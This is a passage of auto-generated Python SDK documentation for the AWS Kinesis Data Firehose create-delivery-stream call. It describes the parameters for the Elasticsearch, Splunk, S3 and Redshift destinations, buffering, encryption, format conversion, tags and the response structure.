:param ElasticsearchDestinationConfiguration: The destination in Amazon ES. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IAM role to be assumed by Kinesis Data Firehose for calling the Amazon ES Configuration API and for indexing documents. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination and Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nDomainARN (string) --The ARN of the Amazon ES domain. The IAM role must have permissions for DescribeElasticsearchDomain , DescribeElasticsearchDomains , and DescribeElasticsearchDomainConfig after assuming the role specified in RoleARN . For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\nSpecify either ClusterEndpoint or DomainARN .\n\nClusterEndpoint (string) --The endpoint to use when communicating with the cluster. Specify either this ClusterEndpoint or the DomainARN field.\n\nIndexName (string) -- [REQUIRED]The Elasticsearch index name.\n\nTypeName (string) --The Elasticsearch type name. For Elasticsearch 6.x, there can be only one type per index. If you try to specify a new type for an existing index that already has another type, Kinesis Data Firehose returns an error during run time.\nFor Elasticsearch 7.x, don\'t specify a TypeName .\n\nIndexRotationPeriod (string) --The Elasticsearch index rotation period. Index rotation appends a timestamp to the IndexName to facilitate the expiration of old data. For more information, see Index Rotation for the Amazon ES Destination . The default value is OneDay .\n\nBufferingHints (dict) --The buffering options. If no value is specified, the default values for ElasticsearchBufferingHints are used.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.\n\n\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon ES. The default value is 300 (5 minutes).\n\nDurationInSeconds (integer) --After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When it is set to FailedDocumentsOnly , Kinesis Data Firehose writes any documents that could not be indexed to the configured Amazon S3 destination, with elasticsearch-failed/ appended to the key prefix. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents with elasticsearch-failed/ appended to the prefix. For more information, see Amazon S3 Backup for the Amazon ES Destination . Default value is FailedDocumentsOnly .\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\nVpcConfiguration (dict) --The details of the VPC of the Amazon ES destination.\n\nSubnetIds (list) -- [REQUIRED]The IDs of the subnets that you want Kinesis Data Firehose to use to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.\nThe number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.\n\n(string) --\n\n\nRoleARN (string) -- [REQUIRED]The ARN of the IAM role that you want the delivery stream to use to create endpoints in the destination VPC.\n\nSecurityGroupIds (list) -- [REQUIRED]The IDs of the security groups that you want Kinesis Data Firehose to use when it creates ENIs in the VPC of the Amazon ES destination.\n\n(string) --\n\n\n\n\n\n
:type SplunkDestinationConfiguration: dict
:param SplunkDestinationConfiguration: The destination in Splunk. You can specify only one destination.\n\nHECEndpoint (string) -- [REQUIRED]The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.\n\nHECEndpointType (string) -- [REQUIRED]This type can be either 'Raw' or 'Event.'\n\nHECToken (string) -- [REQUIRED]This is a GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.\n\nHECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk, or if it doesn\'t receive an acknowledgment of receipt from Splunk.\n\nDurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type Tags: list
:param Tags: A set of tags to assign to the delivery stream. A tag is a key-value pair that you can define and assign to AWS resources. Tags are metadata. For example, you can add friendly names and descriptions or other types of information that can help you distinguish the delivery stream. For more information about tags, see Using Cost Allocation Tags in the AWS Billing and Cost Management User Guide.\nYou can specify up to 50 tags when creating a delivery stream.\n\n(dict) --Metadata that you can assign to a delivery stream, consisting of a key-value pair.\n\nKey (string) -- [REQUIRED]A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\nValue (string) --An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'DeliveryStreamARN': 'string'
}
Response Structure
(dict) --
DeliveryStreamARN (string) --
The ARN of the delivery stream.
Exceptions
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidKMSResourceException
:return: {
'DeliveryStreamARN': 'string'
}
:returns:
DeliveryStreamName (string) -- [REQUIRED]
The name of the delivery stream. This name must be unique per AWS account in the same AWS Region. If the delivery streams are in different accounts or different Regions, you can have multiple delivery streams with the same name.
DeliveryStreamType (string) -- The delivery stream type. This parameter can be one of the following values:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
KinesisStreamSourceConfiguration (dict) -- When a Kinesis data stream is used as the source for the delivery stream, a KinesisStreamSourceConfiguration containing the Kinesis data stream Amazon Resource Name (ARN) and the role ARN for the source stream.
KinesisStreamARN (string) -- [REQUIRED]The ARN of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .
RoleARN (string) -- [REQUIRED]The ARN of the role that provides access to the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .
DeliveryStreamEncryptionConfigurationInput (dict) -- Used to specify the type and Amazon Resource Name (ARN) of the KMS key needed for Server-Side Encryption (SSE).
KeyARN (string) --If you set KeyType to CUSTOMER_MANAGED_CMK , you must specify the Amazon Resource Name (ARN) of the CMK. If you set KeyType to AWS_OWNED_CMK , Kinesis Data Firehose uses a service-account CMK.
KeyType (string) -- [REQUIRED]Indicates the type of customer master key (CMK) to use for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) . When you invoke CreateDeliveryStream or StartDeliveryStreamEncryption with KeyType set to CUSTOMER_MANAGED_CMK, Kinesis Data Firehose invokes the Amazon KMS operation CreateGrant to create a grant that allows the Kinesis Data Firehose service to use the customer managed CMK to perform encryption and decryption. Kinesis Data Firehose manages that grant.
When you invoke StartDeliveryStreamEncryption to change the CMK for a delivery stream that is encrypted with a customer managed CMK, Kinesis Data Firehose schedules the grant it had on the old CMK for retirement.
You can use a CMK of type CUSTOMER_MANAGED_CMK to encrypt up to 500 delivery streams. If a CreateDeliveryStream or StartDeliveryStreamEncryption operation exceeds this limit, Kinesis Data Firehose throws a LimitExceededException .
Warning
To encrypt your delivery stream, use symmetric CMKs. Kinesis Data Firehose doesn\'t support asymmetric CMKs. For information about symmetric and asymmetric CMKs, see About Symmetric and Asymmetric CMKs in the AWS Key Management Service developer guide.
S3DestinationConfiguration (dict) -- [Deprecated] The destination in Amazon S3. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ExtendedS3DestinationConfiguration (dict) -- The destination in Amazon S3. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
S3BackupMode (string) --The Amazon S3 backup mode.
S3BackupConfiguration (dict) --The configuration for backup in Amazon S3.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
DataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.
SchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.
RoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.
CatalogId (string) --The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.
DatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.
TableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.
Region (string) --If you don\'t specify an AWS Region, the default is the current Region.
VersionId (string) --Specifies the table version for the output data schema. If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.
InputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.
Deserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.
OpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.
ConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is "a.b", you can define the column name to be "a_b" when using this option.
The default is false .
CaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.
ColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {"ts": "timestamp"} to map this key to a column named ts .
(string) --
(string) --
HiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.
TimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.
(string) --
OutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.
Serializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.
ParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .
BlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
PageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.
Compression (string) --The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.
EnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.
MaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.
WriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .
OrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .
StripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.
BlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
RowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.
EnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .
PaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.
For the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.
Kinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .
Compression (string) --The compression code to use over data blocks. The default is SNAPPY .
BloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .
(string) --
BloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.
DictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.
FormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .
Enabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.
RedshiftDestinationConfiguration (dict) -- The destination in Amazon Redshift. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
ClusterJDBCURL (string) -- [REQUIRED]The database connection string.
CopyCommand (dict) -- [REQUIRED]The COPY command.
DataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.
DataTableColumns (string) --A comma-separated list of column names.
CopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the "Optional Parameters" section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:
delimiter \'\\t\' lzop; - fields are delimited with "t" (TAB character) and compressed using lzop.delimiter \'|\' - fields are delimited with "|" (this is the default delimiter).
delimiter \'|\' escape - the delimiter should be escaped.
fixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.
JSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.
For more examples, see Amazon Redshift COPY command examples .
Username (string) -- [REQUIRED]The name of the user.
Password (string) -- [REQUIRED]The user password.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).
DurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.
S3Configuration (dict) -- [REQUIRED]The configuration for the intermediate Amazon S3 location from which Amazon Redshift obtains data. Restrictions are described in the topic for CreateDeliveryStream .
The compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationConfiguration.S3Configuration because the Amazon Redshift COPY operation that reads from the S3 bucket doesn\'t support these compression formats.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
